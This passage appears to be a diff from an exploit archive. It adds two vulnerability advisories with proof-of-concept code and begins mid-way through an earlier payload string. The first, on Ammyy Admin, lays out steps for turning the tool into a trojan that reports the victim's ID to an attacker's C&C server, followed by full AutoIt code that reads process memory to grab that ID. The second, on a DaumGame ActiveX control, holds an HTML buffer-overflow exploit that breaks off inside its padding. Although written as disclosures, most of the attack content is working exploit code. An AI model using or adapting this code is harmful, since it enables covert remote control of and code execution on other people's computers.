Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6FAAAABBBB">
</object>

510
platforms/windows/local/31182.txt Executable file
View file

@ -0,0 +1,510 @@
Title:
====
Ammyy Admin - Hidden hard-coded option and Access Control vulnerability.
Credit:
======
Name: Bhadresh Patel
Company/affiliation: Cyberoam Technologies Private Limited
Website: www.cyberoam.com
CVE:
====
- CVE-2013-5581 for hidden hard-coded option (CWE-255).
- CVE-2013-5582 for failure to enforce access restrictions for resources (CWE-264).
Date:
====
17-01-2014
CL-ID:
====
CRD-2013-04
Vendor:
======
Ammyy is in to developing cutting edge internet solutions. They have researched informational technologies and automation management of remote computer access services for many years. The result of their efforts is new Remote Access system "Ammyy Admin".
Product:
=======
Ammyy Admin is the easiest way to establish remote desktop connection. You can easily share a remote desktop or control a server over the Internet with Ammyy Admin.
No matter where you are, Ammyy Admin makes it safe and easy to quickly access a remote desktop within a few seconds.
Ammyy Admin is trusted by more than 21 000 000 personal and corporate users.
Product link: http://www.ammyy.com/en/downloads.html
Abstract:
=======
Cyberoam Threat Research Labs discovered Hidden option and Access Control vulnerability in Ammyy Admin tool.
Report-Timeline (DD-MM-YYYY):
====================
12-08-2013: Vendor notification
13-08-2013: Vendor Response/Feedback
13-12-2013: Vendor Fix/Patch
17-01-2014: Public or Non-Public Disclosure
Affected Version:
=============
Version (<=3.2)
Exploitation-Technique:
===================
Local
Severity Rating:
===================
CVSS Base Score 7.2 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
Details:
=======
There is a Hidden option and Access Control vulnerability in Ammyy Admin tool which allows an attacker to utilize "Ammyy Admin tool" as a trojan horse to access computer without victim's information.
An approach to have hidden option "-nogui" along with storing "client ID" at fixed memory location could be exploited by an attacker to use "Ammyy Admin" as a trojan horse.
Proof Of Concept:
================
An attacker could exploit above vulnerabilities using following steps,
1) Create custom settings.rdp and settings3.bin to allow access to any "computer ID" with predefined password.
2) Use hidden option "-nogui" to run "Ammyy Amin" without the user information.
2) Acquire the client id by reading memory location "004A3658".
3) Send client id to attackers C&C server.
-------- Logs -------
###### Hidden hard-coded option (CVE-2013-5581) ######
root@bhdresh:~# strings AA_v3.2.exe | grep -i ^"-"
-f=*
- 5H
-connect
-set_proxy_
-dosas_
-elevated
-log
-lunch
-nogui
-service
-debug
-remove
-install
-outid
-setsettings
-rstid
-showversion
-notstartclient
-startclient
-minimize
-+/3
#### client ID at Fixed memory location (CVE-2013-5582) ####
=======PoC screenshot=======
http://oi42.tinypic.com/34owtoy.jpg
=======PoC autoit code to hijack client ID=======
Func _memoryopen($iv_pid, $iv_desiredaccess = 2035711, $iv_inherithandle = 1)
If NOT ProcessExists($iv_pid) Then
SetError(1)
Return 0
EndIf
Local $ah_handle[2] = [DllOpen("kernel32.dll")]
If @error Then
SetError(2)
Return 0
EndIf
Local $av_openprocess = DllCall($ah_handle[0], "int", "OpenProcess", "int", $iv_desiredaccess, "int", $iv_inherithandle, "int", $iv_pid)
If @error Then
DllClose($ah_handle[0])
SetError(3)
Return 0
EndIf
$ah_handle[1] = $av_openprocess[0]
Return $ah_handle
EndFunc
Func _memoryread($iv_address, $ah_handle, $sv_type = "dword")
If NOT IsArray($ah_handle) Then
SetError(1)
Return 0
EndIf
Local $v_buffer = DllStructCreate($sv_type)
If @error Then
SetError(@error + 1)
Return 0
EndIf
DllCall($ah_handle[0], "int", "ReadProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If NOT @error Then
Local $v_value = DllStructGetData($v_buffer, 1)
Return $v_value
Else
SetError(6)
Return 0
EndIf
EndFunc
Func _memorywrite($iv_address, $ah_handle, $v_data, $sv_type = "dword")
If NOT IsArray($ah_handle) Then
SetError(1)
Return 0
EndIf
Local $v_buffer = DllStructCreate($sv_type)
If @error Then
SetError(@error + 1)
Return 0
Else
DllStructSetData($v_buffer, 1, $v_data)
If @error Then
SetError(6)
Return 0
EndIf
EndIf
DllCall($ah_handle[0], "int", "WriteProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If NOT @error Then
Return 1
Else
SetError(7)
Return 0
EndIf
EndFunc
Func _memoryclose($ah_handle)
If NOT IsArray($ah_handle) Then
SetError(1)
Return 0
EndIf
DllCall($ah_handle[0], "int", "CloseHandle", "int", $ah_handle[1])
If NOT @error Then
DllClose($ah_handle[0])
Return 1
Else
DllClose($ah_handle[0])
SetError(2)
Return 0
EndIf
EndFunc
Func setprivilege($privilege, $benable)
Const $token_adjust_privileges = 32
Const $token_query = 8
Const $se_privilege_enabled = 2
Local $htoken, $sp_auxret, $sp_ret, $hcurrprocess, $ntokens, $ntokenindex, $priv
$ntokens = 1
$luid = DllStructCreate("dword;int")
If IsArray($privilege) Then $ntokens = UBound($privilege)
$token_privileges = DllStructCreate("dword;dword[" & (3 * $ntokens) & "]")
$newtoken_privileges = DllStructCreate("dword;dword[" & (3 * $ntokens) & "]")
$hcurrprocess = DllCall("kernel32.dll", "hwnd", "GetCurrentProcess")
$sp_auxret = DllCall("advapi32.dll", "int", "OpenProcessToken", "hwnd", $hcurrprocess[0], "int", BitOR($token_adjust_privileges, $token_query), "int*", 0)
If $sp_auxret[0] Then
$htoken = $sp_auxret[3]
DllStructSetData($token_privileges, 1, 1)
$ntokenindex = 1
While $ntokenindex <= $ntokens
If IsArray($privilege) Then
$priv = $privilege[$ntokenindex - 1]
Else
$priv = $privilege
EndIf
$ret = DllCall("advapi32.dll", "int", "LookupPrivilegeValue", "str", "", "str", $priv, "ptr", DllStructGetPtr($luid))
If $ret[0] Then
If $benable Then
DllStructSetData($token_privileges, 2, $se_privilege_enabled, (3 * $ntokenindex))
Else
DllStructSetData($token_privileges, 2, 0, (3 * $ntokenindex))
EndIf
DllStructSetData($token_privileges, 2, DllStructGetData($luid, 1), (3 * ($ntokenindex - 1)) + 1)
DllStructSetData($token_privileges, 2, DllStructGetData($luid, 2), (3 * ($ntokenindex - 1)) + 2)
DllStructSetData($luid, 1, 0)
DllStructSetData($luid, 2, 0)
EndIf
$ntokenindex += 1
WEnd
$ret = DllCall("advapi32.dll", "int", "AdjustTokenPrivileges", "hwnd", $htoken, "int", 0, "ptr", DllStructGetPtr($token_privileges), "int", DllStructGetSize($newtoken_privileges), "ptr", DllStructGetPtr($newtoken_privileges), "int*", 0)
$f = DllCall("kernel32.dll", "int", "GetLastError")
EndIf
$newtoken_privileges = 0
$token_privileges = 0
$luid = 0
If $sp_auxret[0] = 0 Then Return 0
$sp_auxret = DllCall("kernel32.dll", "int", "CloseHandle", "hwnd", $htoken)
If NOT $ret[0] AND NOT $sp_auxret[0] Then Return 0
Return $ret[0]
EndFunc
Func _memorypointerread($iv_address, $ah_handle, $av_offset, $sv_type = "dword")
If IsArray($av_offset) Then
If IsArray($ah_handle) Then
Local $iv_pointercount = UBound($av_offset) - 1
Else
SetError(2)
Return 0
EndIf
Else
SetError(1)
Return 0
EndIf
Local $iv_data[2], $i
Local $v_buffer = DllStructCreate("dword")
For $i = 0 To $iv_pointercount
If $i = $iv_pointercount Then
$v_buffer = DllStructCreate($sv_type)
If @error Then
SetError(@error + 2)
Return 0
EndIf
$iv_address = "0x" & Hex($iv_data[1] + $av_offset[$i])
DllCall($ah_handle[0], "int", "ReadProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If @error Then
SetError(7)
Return 0
EndIf
$iv_data[1] = DllStructGetData($v_buffer, 1)
ElseIf $i = 0 Then
DllCall($ah_handle[0], "int", "ReadProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If @error Then
SetError(7)
Return 0
EndIf
$iv_data[1] = DllStructGetData($v_buffer, 1)
Else
$iv_address = "0x" & Hex($iv_data[1] + $av_offset[$i])
DllCall($ah_handle[0], "int", "ReadProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If @error Then
SetError(7)
Return 0
EndIf
$iv_data[1] = DllStructGetData($v_buffer, 1)
EndIf
Next
$iv_data[0] = $iv_address
Return $iv_data
EndFunc
Func _memorypointerwrite($iv_address, $ah_handle, $av_offset, $v_data, $sv_type = "dword")
If IsArray($av_offset) Then
If IsArray($ah_handle) Then
Local $iv_pointercount = UBound($av_offset) - 1
Else
SetError(2)
Return 0
EndIf
Else
SetError(1)
Return 0
EndIf
Local $iv_structdata, $i
Local $v_buffer = DllStructCreate("dword")
For $i = 0 To $iv_pointercount
If $i = $iv_pointercount Then
$v_buffer = DllStructCreate($sv_type)
If @error Then
SetError(@error + 3)
Return 0
EndIf
DllStructSetData($v_buffer, 1, $v_data)
If @error Then
SetError(8)
Return 0
EndIf
$iv_address = "0x" & Hex($iv_structdata + $av_offset[$i])
DllCall($ah_handle[0], "int", "WriteProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If @error Then
SetError(9)
Return 0
Else
Return $iv_address
EndIf
ElseIf $i = 0 Then
DllCall($ah_handle[0], "int", "ReadProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If @error Then
SetError(3)
Return 0
EndIf
$iv_structdata = DllStructGetData($v_buffer, 1)
Else
$iv_address = "0x" & Hex($iv_structdata + $av_offset[$i])
DllCall($ah_handle[0], "int", "ReadProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If @error Then
SetError(3)
Return 0
EndIf
$iv_structdata = DllStructGetData($v_buffer, 1)
EndIf
Next
EndFunc
Func _memorygetbaseaddress($ah_handle, $ihexdec = 0)
Local $iv_address = 1048576
Local $v_buffer = DllStructCreate("dword;dword;dword;dword;dword;dword;dword")
Local $vdata
Local $vtype
If NOT IsArray($ah_handle) Then
SetError(1)
Return 0
EndIf
DllCall($ah_handle[0], "int", "VirtualQueryEx", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer))
If NOT @error Then
$vdata = Hex(DllStructGetData($v_buffer, 2))
$vtype = Hex(DllStructGetData($v_buffer, 3))
While $vtype <> "00000080"
DllCall($ah_handle[0], "int", "VirtualQueryEx", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer))
$vdata = Hex(DllStructGetData($v_buffer, 2))
$vtype = Hex(DllStructGetData($v_buffer, 3))
If Hex($iv_address) = "01000000" Then ExitLoop
$iv_address += 65536
WEnd
If $vtype = "00000080" Then
SetError(0)
If $ihexdec = 1 Then
Return Dec($vdata)
Else
Return $vdata
EndIf
Else
SetError(2)
Return 0
EndIf
Else
SetError(3)
Return 0
EndIf
EndFunc
Func _memorymodulegetbaseaddress($ipid, $smodule)
If NOT ProcessExists($ipid) Then Return SetError(1, 0, 0)
If NOT IsString($smodule) Then Return SetError(2, 0, 0)
Local $psapi = DllOpen("psapi.dll")
Local $hprocess
Local $permission = BitOR(2, 1024, 8, 16, 32)
If $ipid > 0 Then
Local $hprocess = DllCall("kernel32.dll", "ptr", "OpenProcess", "dword", $permission, "int", 0, "dword", $ipid)
If $hprocess[0] Then
$hprocess = $hprocess[0]
EndIf
EndIf
Local $modules = DllStructCreate("ptr[1024]")
Local $acall = DllCall($psapi, "int", "EnumProcessModules", "ptr", $hprocess, "ptr", DllStructGetPtr($modules), "dword", DllStructGetSize($modules), "dword*", 0)
If $acall[4] > 0 Then
Local $imodnum = $acall[4] / 4
Local $atemp
For $i = 1 To $imodnum
$atemp = DllCall($psapi, "dword", "GetModuleBaseNameW", "ptr", $hprocess, "ptr", Ptr(DllStructGetData($modules, 1, $i)), "wstr", "", "dword", 260)
If $atemp[3] = $smodule Then
DllClose($psapi)
Return Ptr(DllStructGetData($modules, 1, $i))
EndIf
Next
EndIf
DllClose($psapi)
Return SetError(-1, 0, 0)
EndFunc
#EndRegion
Func _memreaddll($dll, $offset, $ah_handle, $sv_type = "dword")
$staticoffset = Dec($offset)
$baseaddr = _memorymodulegetbaseaddress($ah_handle, $dll)
$finaladdr = "0x" & Hex($baseaddr + $staticoffset)
$memtest = _memoryread($finaladdr, $ah_handle, $sv_type)
Return $memtest
EndFunc
Func _memwritedll($dll, $offset, $value, $ah_handle, $sv_type = "dword")
$staticoffset = Dec($offset)
$baseaddr = _memorymodulegetbaseaddress($ah_handle, $dll)
$finaladdr = "0x" & Hex($baseaddr + $staticoffset)
$memtest = _memorywrite($finaladdr, $ah_handle, $value, $sv_type)
Return $memtest
EndFunc
Func _memwritedllbytearray($dll, $offset, $ah_handle, $v_array)
Local $staticoffset = Dec($offset)
Local $baseaddr = _memorymodulegetbaseaddress($ah_handle, $dll)
Local $finaladdr = "0x" & Hex($baseaddr + $staticoffset)
Local $memtest = _memorywritebytearray($finaladdr, $ah_handle, $v_array)
Return $memtest
EndFunc
Func _memorywritebytearray($iv_address, $ah_handle, $v_array)
If NOT IsArray($ah_handle) Then
SetError(1)
Return 0
EndIf
If NOT IsArray($v_array) Then
Return 0
EndIf
Local $emax = UBound($v_array)
Local $bytestring = ""
For $i = 0 To $emax - 1
$bytestring = $bytestring & "byte;"
Next
Local $v_buffer = DllStructCreate($bytestring)
If @error Then
Return 0
Else
For $i = 1 To $emax
DllStructSetData($v_buffer, $i, $v_array[$i - 1])
If @error Then
Return 0
EndIf
Next
EndIf
DllCall($ah_handle[0], "int", "WriteProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If NOT @error Then
Return 1
Else
SetError(7)
Return 0
EndIf
EndFunc
FileChangeDir(@TempDir)
FileDelete("id")
$id = ProcessExists("AAv3.exe")
Local $file = FileOpen("id", 1)
$memoryopen = _memoryopen($id)
While 1
$mem_read1 = _memoryread("0x" & "004A3658", $memoryopen)
If NOT $mem_read1 = "" Then
MsgBox(0, "Cyberoam Threat Research Labs", $mem_read1)
FileWrite($file, $mem_read1)
ExitLoop
EndIf
Sleep(100)
WEnd
_memoryclose($memoryopen)
==========================================
--------------------------
Caveats / Prerequisites:
======================
The attacker needs to entice victims to perform an action in order to exploit this vulnerability.
Risk:
=====
The security risk of Hidden option and Access Control vulnerability is estimated as High.
Credits:
=======
Cyberoam Threat Research Labs - Bhadresh Patel
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Any modified copy or reproduction, including partially usages, of this file requires authorization from Cyberoam Threat Research Labs. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Cyberoam Threat Research Labs.
The first attempt at contact will be through any appropriate contacts or formal mechanisms listed on the vendor Web site, or by sending an e-mail with the pertinent information about the vulnerability. Simultaneous with the vendor being notified, Cyberoam may distribute vulnerability protection filters to its customers' IPS devices through the IPS upgrades.
If a vendor fails to respond after five business days, Cyberoam Threat Research Labs may issue a public advisory disclosing its findings fifteen business days after the initial contact.
If a vendor response is received within the timeframe outlined above, Cyberoam Threat Research Labs will allow the vendor 6-months to address the vulnerability with a patch. At the end of the deadline if a vendor is not responsive or unable to provide a reasonable statement as to why the vulnerability is not fixed, the Cyberoam Threat Research Labs will publish a limited advisory to enable the defensive community to protect the user. We believe that by doing so the vendor will understand the responsibility they have to their customers and will react appropriately.
Cyberoam Threat Research Labs will make every effort to work with vendors to ensure they understand the technical details and severity of a reported security flaw. If a product vendor is unable to, or chooses not to, patch a particular security flaw, Cyberoam Threat Research Labs will offer to work with that vendor to publicly disclose the flaw with some effective workarounds.
Before public disclosure of a vulnerability, Cyberoam Threat Research Labs may share technical details of the vulnerability with other security vendors who are in a position to provide a protective response to a broader user base.
-------------------------------------------------------------------------------------------------------

133
platforms/windows/remote/31179.html Executable file
View file

@ -0,0 +1,133 @@
<!--
Trustwave SpiderLabs Security Advisory TWSL2014-002:
Buffer Overflow Vulnerability in DaumGame ActiveX
Published: 01/07/2014
Version: 1.1
Vendor: Daum (daum.net)
Product: Daum Game ActiveX
Version affected: 1.1.0.5, 1.1.0.4
Product description:
DaumGame ActiveX of Daum Communications is a plugin that is required for
playing in Daum Game website.
Finding 1: ActiveX IconCreate SEH Overwrite Remote Code Execution
Credit: Daniel Chechik of Trustwave SpiderLabs
CVE: CVE-2013-7246
CWE: CWE-119
DaumGame ActiveX versions 1.1.0.5, 1.1.0.4 by Daum Communications includes
the vulnerable method "IconCreate" which is designed to support icon
process. The method which accepts printable characters suffers from buffer
overflow vulnerability that leads to SEH overwrite.
The following Proof of Concept (PoC) executes an harmless calculator. In
this PoC the SEH handler is overwritten with an address from 'msls31.dll'
in order to control EIP.
## daumgame.html
-->
<html>
<body>
<object name="activex2" classid="clsid:16B6A027-2732-4028-9303-EFE3E95EF766"> </object>
<script>
var overwrite = unescape("%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05
%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%
05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%0
5%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05
%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%
